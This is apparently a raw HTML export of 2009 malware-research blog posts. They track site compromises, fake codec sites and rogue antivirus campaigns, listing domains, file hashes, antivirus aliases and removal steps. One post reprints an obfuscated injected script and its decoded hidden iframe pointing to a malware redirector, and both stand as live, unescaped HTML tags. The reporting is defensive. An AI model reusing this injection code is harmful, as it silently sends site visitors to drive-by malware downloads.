cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="320"><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc4dA-usdsI/AAAAAAAAAOI/FVZsDJKeRp0/s1600-h/inside-the-malicious-traffic3.jpg"></a><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc4dAVytUCI/AAAAAAAAAOA/6jB6oGc3_r0/s1600-h/inside-the-malicious-traffic2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 237px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc4dAVytUCI/AAAAAAAAAOA/6jB6oGc3_r0/s320/inside-the-malicious-traffic2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318220101658169378" /><br />
</a><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc4dA-usdsI/AAAAAAAAAOI/FVZsDJKeRp0/s1600-h/inside-the-malicious-traffic3.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc4dA-usdsI/AAAAAAAAAOI/FVZsDJKeRp0/s320/inside-the-malicious-traffic3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318220112647190210" /></a><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc4dAVytUCI/AAAAAAAAAOA/6jB6oGc3_r0/s1600-h/inside-the-malicious-traffic2.jpg"></a></td></tr></table><br />Line 1: <br /><br />hxxp://www.met[BLOCKED]p.com.pl/meta...........<br /><a href="http://wepawet.iseclab.org/view.php?hash=3e9535674077816c195b2f5c4af62a35&t=1238245549&type=js" target="_blank">Javascript Analysis</a><br /><br />Line 23: 77.250.xx.xx<br /><br />http%3A%2F%2Fwww%2Este[BLOCKED]tos%2Enl%2Find.....<br /><a href="http://wepawet.iseclab.org/view.php?hash=3d3e5c04a9caad44c4fd3962a140b796&t=1238243179&type=js" target="_blank">Javascript Analysis<br /></a><br />hxxp://www.gif[BLOCKED]za.pl/gify/baj...<br /><a href="http://wepawet.iseclab.org/view.php?hash=7e4046d551c230b04c501dc9aa443c5e&t=1238238377&type=js" target="_blank">Javascript Analysis</a><br /><br />The analysing confirm that all these site has the same code added<br /><br /><table width="231" height="149" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="827"><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc4dA-usdsI/AAAAAAAAAOI/FVZsDJKeRp0/s1600-h/inside-the-malicious-traffic3.jpg"></a> <script><br /> if (!myia){ document.write(unescape(' <br /> %3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63<br /> %31%35%20%73%72%63%3d%27%68%74%74%70%3a%2f<br /> %2f%73%61%6c%65%76%69%73%69%74%6f%72%2e%6e<br /> %65%74%2f%69%6e%2e%63%67%69%3f%32&%27%2b%<br /> 4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%<br /> 68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35%<br /> 32%38%29%2b%27%37%30%65%33%66%35%31%63%35%<br /> 27%20%77%69%64%74%68%3d%35%32%20%68%65%69%<br /> 67%68%74%3d%34%31%34%20%73%74%79%6c%65%3d%<br /> 27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%<br /> 27%3e%3c%2f%69%66%72%61%6d%65%3e'));<br />}<br />var myia = true; </script> <br /></td></tr><tr><td> </td></tr><tr><td><iframe name=c15 src='http://salevisitor.net/in.cgi?2&'+<br /> Math.round(Math.random()*21528)+'70e3f51c5' <br /> width=52 height=414 style='display: none'></iframe></td></tr></table><br /><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=ce800e9f77d5e2d6e1446872badc869e&t=1235442045" target="_blank">Analysis report for hxxp://salevisitor.net/in.cgi?2</a><br /><br />The script load a PDF located here quara-best.com/[BLOCKED]e30/pdf.php?id=5352<br />which then load this executable --> <a href="http://www.virustotal.com/analisis/719a9978d900f67637d8fb2ef26e3291" target="_blank">VirusTotal Report</a><br /><br />******************
<br /><br /><p> Some other related link:<br /><br /><a href="http://www.honeynet.cz/wm/wm?id=0d7bb5dbba468351f3f31f08e2" target="_blank">Honeynet Malware Detail</a><br />Analysis of hxxp://eternal.alfamoon.com <a href="http://wepawet.iseclab.org/view.php?hash=7b4db35d032c390ff182be81d0d10e4c&t=1238244179&type=js" target="_blank">here</a><br /> <br /> <a href="http://www.myspace.com/154634620" target="_blank">MySpace Profile Attacked</a> (screenshot below)<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc4bXHaVyRI/AAAAAAAAAN4/xUDJkRmMuAY/s1600-h/MySpaceAttack-inside-the-malicious-traffic.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 262px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc4bXHaVyRI/AAAAAAAAAN4/xUDJkRmMuAY/s320/MySpaceAttack-inside-the-malicious-traffic.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318218293911603474" /></a><br /><br /></p></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-2480844641804857847?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-35710265135805514202009-03-28T17:20:00.000-07:002009-03-28T19:16:14.834-07:00loyaldown-loyaltube Fake Codec and RogueAV<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="1802" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td colspan="2" valign="top" height="758"><p><span style="font-size:14px; font-weight:bold">loyaldown09.com, loyaltube10.com Fake Codec and Rogue Antivirus</span><br /><br />loyaldown09.com, loyaltube10.com are site that distribute <b>fake codec</b>. <br />We also have on this network sites which host rogue application like<br />XP-Police-Antivirus and Win-PC-Defender<br /><br />Fake codec and fake scanner page screenshot<br /><br />loyaltube10.com [213.163.65.10]<br /> loyaldown09.com [213.163.65.9] <br /><br />hxxp://loyaltube10.com/scan/?id=..<br /><br /><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sc6-7cbL0RI/AAAAAAAAAQI/C7I674PhTLE/s1600-h/loyaltube09.com-FakeScanner.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 271px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sc6-7cbL0RI/AAAAAAAAAQI/C7I674PhTLE/s320/loyaltube09.com-FakeScanner.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318398138422907154" /></a> <br /> <br />hxxp://loyaltube10.com/tube/?id=...&title=adult+movie<br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc7G9SAxrrI/AAAAAAAAAQY/TaTHMFxmLLY/s1600-h/loyaltube10.com-FakeCodec.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 284px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc7G9SAxrrI/AAAAAAAAAQY/TaTHMFxmLLY/s320/loyaltube10.com-FakeCodec.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318406966080548530" /></a><br /> <br /><br /></p></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Analysis:</b></td></tr><tr><td width="25" height="208" valign="top"><br /></td><td width="547"><br /><b>Redirectors used</b>: hxxp://us-euro.biz/in.cgi?4&parameter=wifi<br />[195.190.13.234]<br /><a href="http://wepawet.iseclab.org/view.php?hash=ff1eeb8db71dfbfc2ae2710aada59ad1&t=1238292178&type=js">Analysis here </a><br />
<br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://loyaltube10.com/scan/?id=..</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://loyaltube10.com/tube/?id=197&title=adult+movie</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://loyaldown11.com/codec/.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td> </td> <td colspan="2">hxxp://loyaldown11.com/codec/189.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://loyaldown11.com/codec/197.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td width="20"> </td><td width="144"><b>File info</b>:</td><td colspan="2">codec.exe</td><td width="18"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">107011 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">704298be5c6bf8671517c79b827c9206</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=704298be5c6bf8671517c79b827c9206" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/ca71008c571ddad0dd20a0beae25511e" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=152859c8c639017940df5f3865ec05a6f" target="_blank">Report (related: WinPC Defender)</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2"><span id="status_fecha">03.29.2009 01:17:30 (CET)</span><br /></td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">6/39 (15.39%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="185"><span style="color:#FF0000">(Suspicious) - DNAScan</span></td><td width="157">CAT-QuickHeal</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td> eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee+Artemis</td><td> </td></tr><tr><td> </td><td> </td><td width="185"><span style="color:#FF0000">TrojanDropper:Win32/Insebro.A</span></td><td>Microsoft</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Malware-Cryptor.Win32.Zorq</span></td><td>VBA32</td><td> </td></tr></table><br /><br /><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://tubeloyal.com/scan/?id-..</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://loyaldown11.com/codec/.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td width="20"> </td><td width="144"><b>File info</b>:</td><td colspan="2">codec.exe</td><td width="18"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">107008 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">eb61517f7f0906dc0e60f0e0afd1bbf1</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=eb61517f7f0906dc0e60f0e0afd1bbf1" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/cef114cf8e0664be1db2657fe7b14a54" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=15b6fc83f49230144f5bf187c8020dcda" target="_blank">Report (related: WinPC Defender)</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2"><span id="status_fecha2">03.29.2009 01:41:38 (CET)</span><br /></td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">6/39 (15.39%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="185"><span style="color:#FF0000">(Suspicious) - DNAScan</span></td><td width="157">CAT-QuickHeal</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td> eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee+Artemis</td><td> </td></tr><tr><td> </td><td> </td><td width="185"><span style="color:#FF0000">TrojanDropper:Win32/Insebro.A</span></td><td>Microsoft</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Malware-Cryptor.Win32.Zorq</span></td><td>VBA32</td><td> </td></tr></table><br /></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Associated websites:</b></td></tr><tr><td height="200"> </td><td><br />[213.163.65.10]<br />loyaltube.com<br />loyaltube09.com<br />loyaltube10.com <br />rakompoporyadkunazaryadku.com <br />setupdatdownload.com <br />tubeloyal.com <br />velzevuladmin.com <br />win-pc-defender.com<br />xp-police-09.com<br />xp-police-2009.com<br />xp-police-antivirus.com<br />xp-police-av.com<br />xp-police-engine.com<br /><br />[213.163.65.9]<br />loyaldown09.com<br />loyaldown11.com <br /><br /></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-3571026513580551420?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-5748028313093578862009-03-28T09:10:00.000-07:002009-03-28T16:36:42.738-07:00av-best-info Anti-VirusN1 Rogue FakeXPA<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="1749" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr> <td colspan="2" valign="top" height="833"><p><span style="font-size:14px; font-weight:bold">av-best.info "VirusDoctor Online Scan" Anti-Virus1 Rogue FakeXPA</span><br /><br />av-best.info is a site that distribute <b>AntivirusN1</b> a rogue antivirus application. <br />
AntiVirusN1 displays fake alerts in order to persuade users buying it. <br /></p><div style="border:solid 1px #0C0; width:500px; padding:15px">Registry keys/values must be deleted with antivirus / antispyware.<br />Anti-Virus Number-1 can be removed by stopping the following processes<br /><br />
- Kill processes: <b>N1Two.exe</b>, <b>N1i.exe, 2.exe, 3.exe<br /> </b>- Unregister DLLs (regsvr32 /u [dll_name]): <b>QWProtect.dll</b><br /><br />- Delete files and folders:<br /><br /><ul style="list-style-type:none"> <li>► C:\Documents and Settings\All Users\Application Data\N1<br /> </li> <li>► %CommonAppData%\N1 <br /> ► %CommonPrograms%\Anti-Virus Number-1</li></ul></div><p>This site appear to be normal at first sight.<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc6kNvHPZzI/AAAAAAAAAPg/Gibm24vGSe8/s1600-h/Anti-Virus_Number-1-Fake-Anti-Virus1.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 262px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc6kNvHPZzI/AAAAAAAAAPg/Gibm24vGSe8/s320/Anti-Virus_Number-1-Fake-Anti-Virus1.jpg" border="0" alt="Antivirus 1 Site Screenshot"id="BLOGGER_PHOTO_ID_5318368765863225138" /></a><br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc6kOLL7P5I/AAAAAAAAAPo/qv-1MYaYcLA/s1600-h/Anti-Virus1_fraudulent_payment.jpg"><img style="cursor:pointer; cursor:hand;width: 222px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc6kOLL7P5I/AAAAAAAAAPo/qv-1MYaYcLA/s320/Anti-Virus1_fraudulent_payment.jpg" border="0" alt="Antivirus 1 Payment system"id="BLOGGER_PHOTO_ID_5318368773399068562" /></a><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc6kNvHPZzI/AAAAAAAAAPg/Gibm24vGSe8/s1600-h/Anti-Virus_Number-1-Fake-Anti-Virus1.jpg"></a><br /><br />The payment system for this fraudulent and rogue program is made via Plimus (screenshot below)<br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc6oKKHP5vI/AAAAAAAAAPw/B2ANUXbGCPM/s1600-h/Plimus-Anti-Virus1_fraudulent_payment.jpg"><img style="cursor:pointer; cursor:hand;width: 211px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc6oKKHP5vI/AAAAAAAAAPw/B2ANUXbGCPM/s320/Plimus-Anti-Virus1_fraudulent_payment.jpg" border="0" alt="Antivirus 1 Payment system by Plimus"id="BLOGGER_PHOTO_ID_5318373102438049522" /></a><br /><br />But the site has been reported as malicious by some users. Here is the fake scanner<br /><br />Site screenshot:<br /><br /><u><b>Fake Security Warning Message</b></u>:<br /><br />Adware.Win32.Look2me.ab Virus Critical <br />Backdoor.Win32.Haxdoor.gu Virus High <br />Trojan-Downloader.Win32.Small.dge Virus High <br />Trojan Horse IRC/Backdoor.SdBot4.FRV Virus Medium <br />W32.Benjamin.Worm Virus High <br />W32.Mypics.Worm.36352 Virus Medium <br />W32.Yaha.B@mm Virus Critical <br />Trojan Horse Generic11.OQJ Virus High <br />Magic DVD Ripper Virus High <br />Recommend: Click "Start Protection" button to erase all threats<br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHxh_wDI/AAAAAAAAAPY/5r-FLGKzlYA/s1600-h/FakeAlertMessage3.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 177px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHxh_wDI/AAAAAAAAAPY/5r-FLGKzlYA/s320/FakeAlertMessage3.jpg" border="0" alt="Fake Security Warning Message"id="BLOGGER_PHOTO_ID_5318303792247062578" /></a><br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHYwipoI/AAAAAAAAAPQ/l9_Z_EtgEXc/s1600-h/FakeAlertMessage2.jpg"><img style="cursor:pointer; cursor:hand;width: 302px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHYwipoI/AAAAAAAAAPQ/l9_Z_EtgEXc/s320/FakeAlertMessage2.jpg" border="0" alt="Fake Security Warning Message: Threat detected"id="BLOGGER_PHOTO_ID_5318303785597183618" /></a><br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHXTsYrI/AAAAAAAAAPA/uXjTTx3ig3A/s1600-h/FakeScannerPage.jpg">
<img style="cursor:pointer; cursor:hand;width: 320px; height: 274px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHXTsYrI/AAAAAAAAAPA/uXjTTx3ig3A/s320/FakeScannerPage.jpg" border="0" alt="Fake scanner page"id="BLOGGER_PHOTO_ID_5318303785207751346" /></a><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc5pG6_nOeI/AAAAAAAAAO4/75zeDWyd-Og/s1600-h/FakeScanner.jpg">
<img style="cursor:pointer; cursor:hand;width: 275px; height: 70px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc5pG6_nOeI/AAAAAAAAAO4/75zeDWyd-Og/s320/FakeScanner.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318303777607334370" /></a><br /><br /><u><b>Fake messages</b></u>:<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHf_0xtI/AAAAAAAAAPI/3eiS4A2E_es/s1600-h/FakeAlertMessage.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 276px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHf_0xtI/AAAAAAAAAPI/3eiS4A2E_es/s320/FakeAlertMessage.jpg" border="0" alt="Fake Security Warning Message"id="BLOGGER_PHOTO_ID_5318303787540334290" /></a><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScjYTrin40I/AAAAAAAAAMA/VQ_XfvbZ9U4/s1600-h/Rogue.Antivirus2010-best-click-scanner.info.jpg"></a><br /><br /></p><table width="343" border="1" style="border:solid 1px #CCC" cellspacing="0" cellpadding="0"><tr> <td width="339" height="117"><i>Alert! Your PC is at risk of virus and spyware attack.<br /><br />Your system requires immediate check!i<br />System Security Scanner will perform a quick and free scan of your PC for viruses and spyware programs.</i></td></tr></table><p>Associated website [174.142.113.206] [ip-174-142-113-206.static.privatedns.com]<br /><br />scanner.av-best.info<br />download.av-best.info<br /><br /></p></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Analysis:</b></td></tr> <tr><td width="25" height="208" valign="top"><br /></td><td width="547"><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>Site URLs</b>:</td> <td colspan="2">hxxp://scanner.av-best.info/scan.php?campaign=mmb_35930207<br />43&landid=4</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://download.av-best.info/install.php?campaign=mmb_3593020743<br />&country=en&counter=0&campaign=mmb_3593020743&landid=4</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td width="20"> </td><td width="91"><b>File info</b>:</td><td colspan="2">AntiVirusInstaller.exe</td><td width="18"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">53278 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">f8d38325d9570ce3320f04e9d5278466</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=f8d38325d9570ce3320f04e9d5278466" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/e9c24e37e26fe8398b529bb0197da58f" target="_blank">Report</a></td><td> </td></tr> <tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=18c7c73a79abe53c4711294e8983e17ea" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2"><span id="status_fecha">03.28.2009 19:18:31 (CET)</span><br /></td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">8/39 (20.52%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="238"><span style="color:#FF0000">TR/Crypt.CFI.Gen</span></td><td width="157">AntiVir</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Win32.Packed.Krap.c.4</span></td><td>CAT-QuickHeal</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.DownLoad.33135</span></td> <td>DrWeb</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td> eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Crypt.CFI.Gen</span></td><td>McAfee-GW-Edition</td><td> </td></tr> <tr><td> </td><td> </td><td width="238"><span style="color:#FF0000">Trojan:Win32/FakeXPA</span></td><td>Microsoft</td><td> </td> </tr> <tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td>Panda</td><td> </td> </tr> <tr><td> </td><td> </td><td><span style="color:#FF0000">Cryp_FakeAV-11</span></td><td>TrendMicro</td><td> </td></tr></table><br /></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>When running:</b></td></tr> <tr><td height="208" valign="top"><br /></td><td><br /><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>HTTP Requests</b>:</td><td width="385">[70.38.11.165]</td><td> </td></tr><tr><td> </td><td> </td><td>http://70.38.11.165/admin/cgi-bin/get_domain.php?type=site</td><td> </td></tr><tr><td> </td><td> </td><td>Content html: av-best.info</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td> </td><td>http://70.38.11.165/admin/cgi-bin/get_domain.php?type=download</td><td> </td></tr><tr><td> </td><td> </td><td>Content html: download.av-best.info</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td> </td><td>[174.142.113.206]</td><td> </td></tr><tr><td> </td><td> </td><td>hxxp://download.av-best.info/en/PE/2.exe</td><td> </td></tr><tr><td> </td><td> </td><td>hxxp://download.av-best.info/en/PE/3.exe</td><td> </td></tr><tr><td> </td><td> </td><td>hxxp://download.av-best.info/en/PE/en/PE/N1.CAB </td><td> </td></tr><tr><td> </td><td> </td><td>hxxp://download.av-best.info/en/PE/en/PE/QWProtect.dll </td><td> </td></tr><tr><td> </td><td> </td><td>hxxp://download.av-best.info/en/PE/en/PE/svchost.exe </td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td width="20"> </td><td width="101"><b>File info</b>:</td><td>2.exe</td><td width="18"> </td></tr><tr><td> </td><td>File size</td><td>53248 Bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td>364f5d30dba520937f9f3b7979b389b1</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>VirusTotal:</b></td><td><a href="http://www.virustotal.com/analisis/a3298bbca2c92a71a94a9714b153f4b2" target="_blank">Report</a> Alias: <span style="color:#FF0000">Trojan.Win32/FakeXPA</span></td><td> </td></tr><tr><td> </td><td> </td><td>Received on 03.28.2009 22:08:07 (CET)</td><td> </td></tr><tr><td> </td><td> </td><td>8/39 (20.52%)</td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td><a href="http://www.threatexpert.com/report.aspx?md5=364f5d30dba520937f9f3b7979b389b1" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>Prevx:</b></td><td><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=CB5463450060BCFED030001B300C2100A3EA542B" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>File info</b>:</td><td>3.exe</td><td> </td></tr><tr><td> </td><td>File size</td><td>257536 Bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td>b7d14c7ea7844057efcfd1a41ddc530f</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>VirusTotal:</b></td><td><a href="http://www.virustotal.com/analisis/57ee185b5803e7d14ce31d5dc390957a" target="_blank">Report</a> Alias: <span style="color:#FF0000">Trojan.Win32/FakeXPA</span></td><td> </td></tr><tr><td> </td><td> </td><td>Received on 03.28.2009 22:08:18 (CET)</td><td> </td></tr><tr><td> </td><td> </td><td>6/39 (15.39%)</td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td><a 